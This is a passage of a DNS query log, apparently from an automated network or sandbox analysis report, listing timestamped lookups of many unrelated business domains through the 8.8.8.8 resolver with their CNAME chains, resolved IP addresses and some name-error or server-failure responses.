                                                                                                                                                                              Sep 15, 2023 07:26:04.612757921 CEST8.8.8.8192.168.2.30xe00cNo error (0)www.valdal.com104.26.6.221A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:04.635704041 CEST8.8.8.8192.168.2.30xd053No error (0)www.depalo.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:04.635704041 CEST8.8.8.8192.168.2.30xd053No error (0)ghs.googlehosted.com142.251.41.51A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:04.733409882 CEST8.8.8.8192.168.2.30x6124No error (0)www.petsfan.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:04.733409882 CEST8.8.8.8192.168.2.30x6124No error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:04.733409882 CEST8.8.8.8192.168.2.30x6124No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:04.733409882 CEST8.8.8.8192.168.2.30x6124No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:04.990729094 CEST8.8.8.8192.168.2.30x5d04No error (0)www.elpro.si104.26.14.53A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:04.990729094 CEST8.8.8.8192.168.2.30x5d04No error (0)www.elpro.si104.26.15.53A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:04.990729094 CEST8.8.8.8192.168.2.30x5d04No error (0)www.elpro.si172.67.70.22A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:05.015599966 CEST8.8.8.8192.168.2.30x34adNo error (0)www.item-pr.comitem-pr.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:05.015599966 CEST8.8.8.8192.168.2.30x34adNo error (0)item-pr.com185.15.129.58A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:05.015599966 CEST8.8.8.8192.168.2.30x34adNo error (0)item-pr.com213.186.33.17A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:05.016493082 CEST8.8.8.8192.168.2.30xa30aNo error (0)www.credo.edu.pl62.122.190.121A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:05.210613966 CEST8.8.8.8192.168.2.30xad78No error (0)www.otena.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:05.228777885 CEST8.8.8.8192.168.2.30x80eNo error (0)www.tvtools.fi104.21.88.198A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:05.228777885 CEST8.8.8.8192.168.2.30x80eNo error (0)www.tvtools.fi172.67.152.159A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:05.693417072 CEST8.8.8.8192.168.2.30x818eNo error (0)www.hummer.huhummer.huCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:05.693417072 CEST8.8.8.8192.168.2.30x818eNo error (0)hummer.hu185.80.51.179A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:05.743160963 CEST8.8.8.8192.168.2.30xcf62No error (0)www.evcpa.comevcpa.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:05.743160963 CEST8.8.8.8192.168.2.30xcf62No error (0)evcpa.com192.124.249.10A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:05.973875046 CEST8.8.8.8192.168.2.30x61c6No error (0)www.wkhk.net206.191.152.37A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:06.169157028 CEST8.8.8.8192.168.2.30x33aeNo error (0)www.transsib.comwww.studyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:06.169157028 CEST8.8.8.8192.168.2.30x33aeNo error (0)www.studyrussian.comstudyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:06.169157028 CEST8.8.8.8192.168.2.30x33aeNo error (0)studyrussian.com80.74.154.6A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:06.237323046 CEST8.8.8.8192.168.2.30x2d21Name error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:06.237991095 CEST8.8.8.8192.168.2.30x44a5No error (0)www.abdg.com192.252.154.18A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:06.250009060 CEST8.8.8.8192.168.2.30x2d21Name error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:06.289170027 CEST8.8.8.8192.168.2.30x3301No error (0)www.waldi.plwaldi.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:06.289170027 CEST8.8.8.8192.168.2.30x3301No error (0)waldi.pl46.242.238.60A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:06.369437933 CEST8.8.8.8192.168.2.30x5cadNo error (0)www.xaicom.esxaicom.esCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:06.369437933 CEST8.8.8.8192.168.2.30x5cadNo error (0)xaicom.es188.165.133.163A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:06.387214899 CEST8.8.8.8192.168.2.30x7c3fNo error (0)www.abart.plabart.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:06.387214899 CEST8.8.8.8192.168.2.30x7c3fNo error (0)abart.pl89.161.163.246A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:06.622714996 CEST8.8.8.8192.168.2.30xcb3dNo error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:06.622714996 CEST8.8.8.8192.168.2.30xcb3dNo error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:06.807197094 CEST8.8.8.8192.168.2.30x997No error (0)www.mqs.com.brwww.mqs.com.br.cdn.gocache.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:06.807197094 CEST8.8.8.8192.168.2.30x997No error (0)www.mqs.com.br.cdn.gocache.net170.82.174.30A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:06.807197094 CEST8.8.8.8192.168.2.30x997No error (0)www.mqs.com.br.cdn.gocache.net170.82.173.30A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:07.094367981 CEST8.8.8.8192.168.2.30x70e8No error (0)www.ora.ecnet.jpora.ecnet.jpCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:07.094367981 CEST8.8.8.8192.168.2.30x70e8No error (0)ora.ecnet.jp60.43.154.138A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:07.099518061 CEST8.8.8.8192.168.2.30x4ed0No error (0)www.naoi-a.com202.254.236.40A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:07.131781101 CEST8.8.8.8192.168.2.30x2a36No error (0)www.aevga.comaevga.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:07.131781101 CEST8.8.8.8192.168.2.30x2a36No error (0)aevga.com108.167.164.216A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:07.174299955 CEST8.8.8.8192.168.2.30xde70No error (0)www.yocinc.org66.94.119.160A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:07.503456116 CEST8.8.8.8192.168.2.30x698fNo error (0)www.iamdirt.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:07.503456116 CEST8.8.8.8192.168.2.30x698fNo error (0)ghs.googlehosted.com142.251.41.51A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:07.836535931 CEST8.8.8.8192.168.2.30xcbb2No error (0)www.stnic.co.uk77.68.50.105A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:08.009346008 CEST8.8.8.8192.168.2.30x3fcNo error (0)www.vitaindu.com122.128.109.107A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:08.242893934 CEST8.8.8.8192.168.2.30xe77fName error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:08.263917923 CEST8.8.8.8192.168.2.30x3c23No error (0)www.wifi4all.nl104.21.42.10A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:08.263917923 CEST8.8.8.8192.168.2.30x3c23No error (0)www.wifi4all.nl172.67.198.26A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:08.385370016 CEST8.8.8.8192.168.2.30xa624No error (0)www.jacomfg.com96.127.180.42A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:08.413811922 CEST8.8.8.8192.168.2.30x30e2No error (0)www.nelipak.nl82.201.61.230A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:08.505196095 CEST8.8.8.8192.168.2.30xe2abNo error (0)www.gpthink.com39.99.233.155A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:08.664364100 CEST8.8.8.8192.168.2.30x12aNo error (0)www.fcwcvt.org104.21.25.200A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:08.664364100 CEST8.8.8.8192.168.2.30x12aNo error (0)www.fcwcvt.org172.67.134.134A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:08.666523933 CEST8.8.8.8192.168.2.30x2caeName error (3)www.medisa.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:08.917797089 CEST8.8.8.8192.168.2.30x5e2cNo error (0)www.jchysk.com208.97.178.138A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:08.933264017 CEST8.8.8.8192.168.2.30x284dNo error (0)www.valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:08.950434923 CEST8.8.8.8192.168.2.30x61c6Server failure (2)www.wkhk.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:09.073890924 CEST8.8.8.8192.168.2.30xb4a6No error (0)www.mobilnic.net154.203.14.100A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:09.242959023 CEST8.8.8.8192.168.2.30xf62dNo error (0)www.edimart.hu81.2.194.241A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:09.274379015 CEST8.8.8.8192.168.2.30xe0e1No error (0)www.snugpak.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:09.274379015 CEST8.8.8.8192.168.2.30xe0e1No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:09.525198936 CEST8.8.8.8192.168.2.30x6872No error (0)www.dayvo.com104.21.68.7A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:09.525198936 CEST8.8.8.8192.168.2.30x6872No error (0)www.dayvo.com172.67.184.30A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:09.807502031 CEST8.8.8.8192.168.2.30x850aNo error (0)www.photo4b.com195.78.66.50A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:09.846491098 CEST8.8.8.8192.168.2.30xac6fNo error (0)www.2print.com2print.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:09.846491098 CEST8.8.8.8192.168.2.30xac6fNo error (0)2print.com107.180.98.101A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:10.026879072 CEST8.8.8.8192.168.2.30x62e7No error (0)www.pcgrate.com172.67.201.26A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:10.026879072 CEST8.8.8.8192.168.2.30x62e7No error (0)www.pcgrate.com104.21.66.46A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:10.179625034 CEST8.8.8.8192.168.2.30xcd39No error (0)www.stajum.com162.43.120.128A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:10.439959049 CEST8.8.8.8192.168.2.30xb785No error (0)www.crcsi.orgcrcsi.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:10.439959049 CEST8.8.8.8192.168.2.30xb785No error (0)crcsi.org165.227.252.190A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:10.479901075 CEST8.8.8.8192.168.2.30x2adfNo error (0)www.x0c.com104.247.81.50A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:10.880274057 CEST8.8.8.8192.168.2.30x1aecNo error (0)www.fink.com69.163.218.51A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:10.929255009 CEST8.8.8.8192.168.2.30xc56bNo error (0)www.ora-ito.com213.186.33.40A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:10.973905087 CEST8.8.8.8192.168.2.30x61c6Server failure (2)www.wkhk.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:11.019507885 CEST8.8.8.8192.168.2.30x4f44No error (0)www.holleman.us51.79.51.72A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:11.027039051 CEST8.8.8.8192.168.2.30x5f71No error (0)www.kernsafe.com104.26.2.124A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:11.027039051 CEST8.8.8.8192.168.2.30x5f71No error (0)www.kernsafe.com172.67.72.98A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:11.027039051 CEST8.8.8.8192.168.2.30x5f71No error (0)www.kernsafe.com104.26.3.124A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:11.048100948 CEST8.8.8.8192.168.2.30x4f44No error (0)www.holleman.us51.79.51.72A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:11.100611925 CEST8.8.8.8192.168.2.30x4efdName error (3)www.yumgiskor.kznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:11.415085077 CEST8.8.8.8192.168.2.30x45f8No error (0)www.netcr.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:11.415085077 CEST8.8.8.8192.168.2.30x45f8No error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:11.415085077 CEST8.8.8.8192.168.2.30x45f8No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:11.415085077 CEST8.8.8.8192.168.2.30x45f8No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:11.621865034 CEST8.8.8.8192.168.2.30xf94cNo error (0)www.pupi.cz103.224.182.241A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:11.970474005 CEST8.8.8.8192.168.2.30xb147No error (0)www.nqks.comlive.websites.hibu.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:11.970474005 CEST8.8.8.8192.168.2.30xb147No error (0)live.websites.hibu.comhibu-4.zenedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:11.970474005 CEST8.8.8.8192.168.2.30xb147No error (0)hibu-4.zenedge.netzemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:11.970474005 CEST8.8.8.8192.168.2.30xb147No error (0)zemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.nethibu34.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:11.970474005 CEST8.8.8.8192.168.2.30xb147No error (0)hibu34.inregion.waas.oci.oraclecloud.net147.154.0.23A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:12.014950991 CEST8.8.8.8192.168.2.30x4f44No error (0)www.holleman.us51.79.51.72A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:12.045784950 CEST8.8.8.8192.168.2.30xc582No error (0)www.ex-olive.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:12.183231115 CEST8.8.8.8192.168.2.30x57f5No error (0)www.lrsuk.comlanguage-recruitment.eu-2.volcanic.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:12.183231115 CEST8.8.8.8192.168.2.30x57f5No error (0)language-recruitment.eu-2.volcanic.cloudd2kt7vovxa5e81.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:12.183231115 CEST8.8.8.8192.168.2.30x57f5No error (0)d2kt7vovxa5e81.cloudfront.net99.84.160.31A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:12.183231115 CEST8.8.8.8192.168.2.30x57f5No error (0)d2kt7vovxa5e81.cloudfront.net99.84.160.7A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:12.183231115 CEST8.8.8.8192.168.2.30x57f5No error (0)d2kt7vovxa5e81.cloudfront.net99.84.160.19A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:12.183231115 CEST8.8.8.8192.168.2.30x57f5No error (0)d2kt7vovxa5e81.cloudfront.net99.84.160.34A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:12.859584093 CEST8.8.8.8192.168.2.30x27eNo error (0)www.myropcb.com74.208.236.101A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:13.027324915 CEST8.8.8.8192.168.2.30x4f44No error (0)www.holleman.us51.79.51.72A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:13.289812088 CEST8.8.8.8192.168.2.30x2d18No error (0)www.tyrns.com217.79.184.35A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:13.318173885 CEST8.8.8.8192.168.2.30x64a0No error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:14.655901909 CEST8.8.8.8192.168.2.30x3abdNo error (0)www.yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:14.792329073 CEST8.8.8.8192.168.2.30x7b92No error (0)www.spanesi.com5.196.166.214A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:15.347825050 CEST8.8.8.8192.168.2.30x1ebaNo error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:15.352128029 CEST8.8.8.8192.168.2.30x6b14No error (0)www.tc17.com104.21.79.244A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:15.352128029 CEST8.8.8.8192.168.2.30x6b14No error (0)www.tc17.com172.67.150.80A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:20.781512976 CEST8.8.8.8192.168.2.30xbd7bNo error (0)www.pr-park.com118.27.125.181A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:20.808242083 CEST8.8.8.8192.168.2.30x7737No error (0)www.ftchat.com172.67.140.52A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:20.808242083 CEST8.8.8.8192.168.2.30x7737No error (0)www.ftchat.com104.21.46.148A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:20.811022997 CEST8.8.8.8192.168.2.30x4adcNo error (0)www.dgmna.comdgmna.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:20.811022997 CEST8.8.8.8192.168.2.30x4adcNo error (0)dgmna.com192.124.249.20A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:20.813498974 CEST8.8.8.8192.168.2.30x651eNo error (0)www.jenco.co.uk172.67.208.67A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:20.813498974 CEST8.8.8.8192.168.2.30x651eNo error (0)www.jenco.co.uk104.21.23.9A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:20.815835953 CEST8.8.8.8192.168.2.30xf0cNo error (0)www.quadlock.comquadlock.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:20.815835953 CEST8.8.8.8192.168.2.30xf0cNo error (0)quadlock.com70.39.251.249A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:20.816481113 CEST8.8.8.8192.168.2.30x7fd3No error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:20.816481113 CEST8.8.8.8192.168.2.30x7fd3No error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:20.821816921 CEST8.8.8.8192.168.2.30xee73No error (0)www.pdqhomes.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:20.821816921 CEST8.8.8.8192.168.2.30xee73No error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:20.821816921 CEST8.8.8.8192.168.2.30xee73No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:20.821816921 CEST8.8.8.8192.168.2.30xee73No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:20.897572041 CEST8.8.8.8192.168.2.30xc50bNo error (0)www.olras.com80.93.82.33A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:21.009850979 CEST8.8.8.8192.168.2.30x2d9cNo error (0)www.baijaku.combaijaku.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:21.009850979 CEST8.8.8.8192.168.2.30x2d9cNo error (0)baijaku.com59.106.19.204A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:21.248296022 CEST8.8.8.8192.168.2.30x542eNo error (0)www.alteor.clcdn1.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:21.248296022 CEST8.8.8.8192.168.2.30x542eNo error (0)cdn1.wixdns.nettd-ccm-neg-87-45.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:21.248296022 CEST8.8.8.8192.168.2.30x542eNo error (0)td-ccm-neg-87-45.wixdns.net34.149.87.45A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:21.425677061 CEST8.8.8.8192.168.2.30xdd4aNo error (0)www.valdal.com104.26.7.221A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:21.425677061 CEST8.8.8.8192.168.2.30xdd4aNo error (0)www.valdal.com172.67.73.176A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:21.425677061 CEST8.8.8.8192.168.2.30xdd4aNo error (0)www.valdal.com104.26.6.221A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:21.480747938 CEST8.8.8.8192.168.2.30x9fcdNo error (0)www.depalo.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:21.480747938 CEST8.8.8.8192.168.2.30x9fcdNo error (0)ghs.googlehosted.com142.251.41.51A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:21.501935959 CEST8.8.8.8192.168.2.30xdaf1No error (0)www.petsfan.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:21.501935959 CEST8.8.8.8192.168.2.30xdaf1No error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:21.501935959 CEST8.8.8.8192.168.2.30xdaf1No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:21.501935959 CEST8.8.8.8192.168.2.30xdaf1No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:21.817238092 CEST8.8.8.8192.168.2.30x4403No error (0)www.credo.edu.pl62.122.190.121A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:21.858747005 CEST8.8.8.8192.168.2.30xbbd4No error (0)www.item-pr.comitem-pr.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:21.858747005 CEST8.8.8.8192.168.2.30xbbd4No error (0)item-pr.com185.15.129.58A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:21.858747005 CEST8.8.8.8192.168.2.30xbbd4No error (0)item-pr.com213.186.33.17A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:21.972505093 CEST8.8.8.8192.168.2.30x3f55No error (0)www.tvtools.fi172.67.152.159A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:21.972505093 CEST8.8.8.8192.168.2.30x3f55No error (0)www.tvtools.fi104.21.88.198A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:21.975265026 CEST8.8.8.8192.168.2.30x9fd6No error (0)www.elpro.si104.26.14.53A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:21.975265026 CEST8.8.8.8192.168.2.30x9fd6No error (0)www.elpro.si172.67.70.22A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:21.975265026 CEST8.8.8.8192.168.2.30x9fd6No error (0)www.elpro.si104.26.15.53A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:21.978415012 CEST8.8.8.8192.168.2.30xa85cNo error (0)www.otena.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:22.092329025 CEST8.8.8.8192.168.2.30xf5faName error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:22.239695072 CEST8.8.8.8192.168.2.30x77d9No error (0)www.hummer.huhummer.huCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:22.239695072 CEST8.8.8.8192.168.2.30x77d9No error (0)hummer.hu185.80.51.179A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:22.263611078 CEST8.8.8.8192.168.2.30x8a8No error (0)www.abart.plabart.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:22.263611078 CEST8.8.8.8192.168.2.30x8a8No error (0)abart.pl89.161.163.246A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:22.490442991 CEST8.8.8.8192.168.2.30xf920No error (0)www.evcpa.comevcpa.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:22.490442991 CEST8.8.8.8192.168.2.30xf920No error (0)evcpa.com192.124.249.10A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:22.881170988 CEST8.8.8.8192.168.2.30x326cNo error (0)www.transsib.comwww.studyrussian.comCNAME (Canonical name)IN (0x0001)false
